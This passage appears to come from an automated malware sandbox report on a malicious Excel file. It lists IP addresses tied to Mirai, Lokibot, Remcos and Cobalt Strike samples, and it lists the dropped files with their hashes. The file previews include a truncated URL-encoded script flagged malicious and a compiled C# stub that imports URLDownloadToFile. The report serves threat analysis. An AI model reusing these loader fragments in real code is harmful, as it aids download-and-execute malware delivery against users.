                                                                                    • 172.245.123.45
                                                                                    seethebestthingstobegetmebackwithherlove.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                    • 23.94.171.157
                                                                                    necgoodthingswithgreatthingsentirethingstobeinonline.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                    • 107.173.4.9
                                                                                    TLN-ASDEzDAH4anUtC.elfGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.88.227
                                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.88.221
                                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.226
                                                                                    hR6s75mYfS.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.234
                                                                                    sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.221
                                                                                    zMtlCW3JE2.exeGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.57.195
                                                                                    x86.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.220
                                                                                    TV9gyhWdj9.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.230
                                                                                    gWG8IWTQvp.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.202
                                                                                    fU0e51cFa3Get hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.207
                                                                                    TLN-ASDEzDAH4anUtC.elfGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.88.227
                                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.88.221
                                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.226
                                                                                    hR6s75mYfS.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.234
                                                                                    sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.221
                                                                                    zMtlCW3JE2.exeGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.57.195
                                                                                    x86.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.220
                                                                                    TV9gyhWdj9.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.230
                                                                                    gWG8IWTQvp.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.202
                                                                                    fU0e51cFa3Get hashmaliciousMiraiBrowse
                                                                                    • 5.159.88.207
                                                                                    NET1-ASBGLogs.xlsGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.220
                                                                                    SOA October 24_1.docGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.220
                                                                                    17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exeGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.220
                                                                                    hZ6ZMDS1rc.exeGet hashmaliciousAsyncRATBrowse
                                                                                    • 93.123.39.76
                                                                                    New Order.exeGet hashmaliciousLokibotBrowse
                                                                                    • 94.156.177.220
                                                                                    boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 93.123.85.38
                                                                                    boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 93.123.85.38
                                                                                    boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                    • 93.123.85.38
                                                                                    boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 93.123.85.38
                                                                                    boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 93.123.85.38
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    05af1f5ca1b87cc9cc9b25185115607dA & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 142.250.186.142
                                                                                    • 216.58.212.174
                                                                                    • 142.250.186.97
                                                                                    #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                    • 142.250.186.142
                                                                                    • 216.58.212.174
                                                                                    • 142.250.186.97
                                                                                    PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                    • 142.250.186.142
                                                                                    • 216.58.212.174
                                                                                    • 142.250.186.97
                                                                                    PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                    • 142.250.186.142
                                                                                    • 216.58.212.174
                                                                                    • 142.250.186.97
                                                                                    Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                    • 142.250.186.142
                                                                                    • 216.58.212.174
                                                                                    • 142.250.186.97
                                                                                    InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 142.250.186.142
                                                                                    • 216.58.212.174
                                                                                    • 142.250.186.97
                                                                                    CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 142.250.186.142
                                                                                    • 216.58.212.174
                                                                                    • 142.250.186.97
                                                                                    oodforme.docGet hashmaliciousRemcosBrowse
                                                                                    • 142.250.186.142
                                                                                    • 216.58.212.174
                                                                                    • 142.250.186.97
                                                                                    EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                    • 142.250.186.142
                                                                                    • 216.58.212.174
                                                                                    • 142.250.186.97
                                                                                    SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                    • 142.250.186.142
                                                                                    • 216.58.212.174
                                                                                    • 142.250.186.97
                                                                                    7dcce5b76c8b17472d024758970a406bA & C Metrology OC 5457144.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.62.244
                                                                                    • 5.159.62.243
                                                                                    #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                    • 5.159.62.244
                                                                                    • 5.159.62.243
                                                                                    PO NAHK22012FA000000.docxGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.62.244
                                                                                    • 5.159.62.243
                                                                                    PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                                                                                    • 5.159.62.244
                                                                                    • 5.159.62.243
                                                                                    Logs.xlsGet hashmaliciousLokibotBrowse
                                                                                    • 5.159.62.244
                                                                                    • 5.159.62.243
                                                                                    Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.62.244
                                                                                    • 5.159.62.243
                                                                                    InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 5.159.62.244
                                                                                    • 5.159.62.243
                                                                                    EX0096959.docx.docGet hashmaliciousRemcosBrowse
                                                                                    • 5.159.62.244
                                                                                    • 5.159.62.243
                                                                                    Inv No.248730.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.62.244
                                                                                    • 5.159.62.243
                                                                                    Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 5.159.62.244
                                                                                    • 5.159.62.243
                                                                                    No context
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):4742
                                                                                    Entropy (8bit):4.8105940880640246
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                    MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                    SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                    SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                    SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                    Malicious:false
                                                                                    Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):133636
                                                                                    Entropy (8bit):2.5269830459558813
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:Eam7QSo4DH5wo4DH5rtTRJP4srvjTKP4DH5Sr4DH5NFAb5UAf4DH5G7T:Ea2Rok0RLknYoVT
                                                                                    MD5:0B1AA8AE190D05DF71F4052FAE67DF5B
                                                                                    SHA1:F6FE29F3E7830B15E3B244BA83216C029DCB60FB
                                                                                    SHA-256:4E15EAB180712F99EFE5EEA760BEEA458C7BFC4EEB5F5961B2B5D0C9B7611D3D
                                                                                    SHA-512:94008A8BF00A1334C16129258243BF89D8351C82EDE845FEFDB657838FE2F602F761B9935E5FEF5E01B368096993F49A48E65D3705CEA948D9435DB0DF370A04
                                                                                    Malicious:true
                                                                                    Preview:<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscRiPT%252520TYpE%25253D%252522TexT/vBscrIpt%252522%25253E%25250ADiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):139890
                                                                                    Entropy (8bit):3.6923510936476616
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:vybNgt5pdGwoO4TxQQYQt2Cwvo6buGauOmM:0DNlYTdvo6TauOx
                                                                                    MD5:52A69AB69D1C871566791A3C06982607
                                                                                    SHA1:367845C8B76D602680EE6069F3BDE95E02C350D9
                                                                                    SHA-256:4F6090A3D6A848AE3EF2310CACA02976FE8448FC21CBE357F4A28A88F34EAD28
                                                                                    SHA-512:681B60151EF27726F8B4C9C0949A8962FA8B16FE3583BA5EE4019831B6AC2AD5BF2562DA0E8FC55CDEC4CB10C59A608896B9BE98BEDD1A8BBDE43B711EE2E0C2
                                                                                    Malicious:false
                                                                                    Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.s.t.a.m.b.r.e.i.r.o.)..... . . . .d.i.m. .a.p.o.u.c.a.d.o.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .a.p.o.u.c.a.d.o..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .a.p.o.u.c.a.d.o.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . .
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                    Category:dropped
                                                                                    Size (bytes):172076
                                                                                    Entropy (8bit):3.1342558498505824
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                                                                                    MD5:D85DAC1376E45C58F790BD50C2729F6C
                                                                                    SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                                                                                    SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                                                                                    SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                                                                                    Malicious:false
                                                                                    Preview:....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                    Category:dropped
                                                                                    Size (bytes):172076
                                                                                    Entropy (8bit):3.1342558498505824
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                                                                                    MD5:D85DAC1376E45C58F790BD50C2729F6C
                                                                                    SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                                                                                    SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                                                                                    SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                                                                                    Malicious:false
                                                                                    Preview:....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
                                                                                    Category:dropped
                                                                                    Size (bytes):469
                                                                                    Entropy (8bit):3.7537928868168384
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:V/DsYLDS81zuly0NIMmFB7QXReKJ8SRHy4H6xr8MCLJWxWJWKy:V/DTLDfuldcWXfH1MeGOWKy
                                                                                    MD5:DE4A3E7070E220B427D460A803BF2B1B
                                                                                    SHA1:F59C55466008CA3D557CC114C01395BA724A3A32
                                                                                    SHA-256:0652DA0455490EAF890DDCBC122A763D5F4031A9B2825D514D105BD8EA142EAE
                                                                                    SHA-512:AFED9FF23E8F788D80F409856741BC68E985EB0092412F91E709D917FC37EA47E43B2560313195E5C0F8FACC6232DDD74E5CA38C66D16AF31D5F7B4984999B85
                                                                                    Malicious:false
                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace rpwYIiFsex.{. public class niee. {. [DllImport("Urlmon.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr RhPAWaU,string ZHOGcU,string Qo,uint lshbPHts,IntPtr j);.. }..}.
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):369
                                                                                    Entropy (8bit):5.286924617797865
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fJ3Uzxs7+AEszIP23fJhn:p37Lvkmb6KzBkWZEoBh
                                                                                    MD5:5127765E52BE89F42E88EE541EA2DA17
                                                                                    SHA1:4D73DCF332A76B6FAB5361F663E132DA178F5027
                                                                                    SHA-256:A4FF7DBE70698FFF76604604D30792DB6AF0821B52C2E4B30102A446D28613E0
                                                                                    SHA-512:CB9C6D39C511ED71676D09A55D42EADAAA6CA168EC0ED1897661B35535651C1489F1846A39E7C2DDED1E8BB3724B7AEC662543AFD7C5E5494E3D8FFA28FDC336
                                                                                    Malicious:true
                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.0.cs"
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3072
                                                                                    Entropy (8bit):2.820207680412466
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:etGSXPBG5eM7p8mqBk+lTzz3tkZfV46qhkWI+ycuZhNtakS7PNnq:6QsM+mAXKJVXEH1ulta3xq
                                                                                    MD5:D38194577D9309BB5A0F573F737A6DFF
                                                                                    SHA1:B69E5216B799FBD41F66955C51B34CBAA8EC176E
                                                                                    SHA-256:EB7B7B2B9E7F1A7593A991F3B3BA53AAC053BE41304CE24E7DB889B17CBE65F4
                                                                                    SHA-512:EED8A9D778BD79E6A48CA3E12544537EC17E41224FB6992213D1CA2A462BC90DED92F63C50CDF628B7ECBE068196B27B3732CB8004F57708EDECD48CEB622E36
                                                                                    Malicious:false
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....s.....s.......................................... >.....P ......P.........V.....^.....e.....h.....q...P.....P...!.P.....P.......!.....*.......>.......................................'..........<Module>.41
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):866
                                                                                    Entropy (8bit):5.364415071071309
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:AId3ka6KzBFEoBEKaMD5DqBVKVrdFAMBJTH:Akka60BFEoBEKdDcVKdBJj
                                                                                    MD5:BBB163F7CB67B7F5F4D526F8D3634EA8
                                                                                    SHA1:134D938CC48CF9D2524B96864D2A6B8174853800
                                                                                    SHA-256:B3C6014D44F22B76E0DF6710C307181AE57161C99608DB2141E2E72C5A200E13
                                                                                    SHA-512:D0D8D89809099C5E467B9391A3563FF1AB59DB2CD7A7FE44EADC5547192C38E2B95A78B1659F47BF2B0B4991ED406EA978461CD91C5B8016BF39A5A7AC340789
                                                                                    Malicious:false
                                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):652
                                                                                    Entropy (8bit):3.115151898562488
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7Ynqq7PN5Dlq5J:+RI+ycuZhNtakS7PNnqX
                                                                                    MD5:DB4FCFC97F114BDCF1407398C200861D
                                                                                    SHA1:8B61E13F4C25364FE0474C16A40D53767975E822
                                                                                    SHA-256:3EF16C2044ACA9ABEF9C394BC877A56BCCB9718F27288A37C45B188D7A66BD60
                                                                                    SHA-512:5C8E5BEE3074D608C8F7CC8C14FBAFAE0A915B509E81963C333E55D6C11C143EC6FA6F547140692741BBAC5E9594746FF9EA12AD0F1EECAD2ACBA3832A6AEE08
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.1.k.3.1.j.e.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.1.k.3.1.j.e.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
